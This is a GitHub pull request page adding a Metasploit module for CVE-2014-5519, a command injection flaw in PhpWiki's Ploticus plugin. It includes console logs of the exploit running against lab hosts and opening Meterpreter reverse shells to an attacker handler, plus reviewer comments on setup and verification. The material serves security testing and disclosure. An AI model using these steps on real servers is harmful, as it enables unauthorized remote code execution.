Module for CVE-2014-5519, phpwiki/ploticus RCE #3799

Merged
merged 2 commits into from Sep 16, 2014

@us3r777 us3r777 commented Sep 16, 2014

Description

The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via command injection. Discovery and POC done by Benjamin Harris.

Links

http://www.exploit-db.com/exploits/34451/
http://www.cvedetails.com/cve/CVE-2014-5519/
http://seclists.org/fulldisclosure/2014/Aug/77

Reproduction steps

Tests

2014-09-16 14:19:04 +0200 S:0 J:0> use exploit/multi/http/phpwiki_ploticus_exec 
2014-09-16 14:19:12 +0200 S:0 J:0 exploit(phpwiki_ploticus_exec) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
2014-09-16 14:19:18 +0200 S:0 J:0 exploit(phpwiki_ploticus_exec) > run

[*] Started reverse handler on 192.168.56.1:4444 
[*] 192.168.56.101:80 - Executing payload gpPdLWOs.php
[*] Sending stage (40551 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:55045) at 2014-09-16 14:19:23 +0200

meterpreter > getuid
Server username: www-data (33)

[
[ 'CVE', '2014-5519' ],
[ 'OSVDB', '110576' ],
[ 'URL', 'http://www.exploit-db.com/exploits/34451/']

For Exploit-DB, you can use EDB instead of URL.

See all the identifiers you can use:
https://github.com/rapid7/metasploit-framework/wiki/Metasploit-module-reference-identifiers

Use EDB instead of URL for Exploit-DB.
Remove peer variable as peer comes from HttpClient.
@wchen-r7

I am having trouble setting up this app. I keep getting this:

Call to undefined method WikiDB_backend_dba::WikiDB_backend_dbaBase() in /var/www/html/phpwiki-1.5.0/lib/WikiDB/backend/dba.php on line 35

I find no function WikiDB_backend_dbaBase. Looks like a broken build?

@wchen-r7

Never mind. I figured it out. It is indeed a broken build. Looks like it's meant to call the parent method.

@wchen-r7

Filed a ticket for the bug I hit:
https://sourceforge.net/p/phpwiki/bugs/647/

@wchen-r7

It looks like 1.5.0 is patched. I haven't really looked into the actual fix, but the exploit will trigger errors complaining about accessing protected methods... I am guessing that is the "patch".

@wchen-r7

The actual fix might be this:
https://sourceforge.net/p/phpwiki/code/8974/?page=1

@wchen-r7

Exploit verified:

msf exploit(phpwiki_ploticus_exec) > rerun
[*] Reloading module...

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.114:80 - Executing payload fyjxncEV.php
[*] Sending stage (40551 bytes) to 192.168.1.114
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.114:40402) at 2014-09-16 12:42:55 -0500

meterpreter >

@wchen-r7 wchen-r7 self-assigned this Sep 16, 2014
@wchen-r7

Landing the PR in a bit. Made minor edits to msftidy and added two more references for bug tracking purposes.

@wchen-r7 wchen-r7 merged commit 7a7b6cb into rapid7:master Sep 16, 2014
wchen-r7 added a commit that referenced this pull request Sep 16, 2014
@us3r777 us3r777 deleted the phpwiki_ploticus_exec branch December 8, 2014 17:59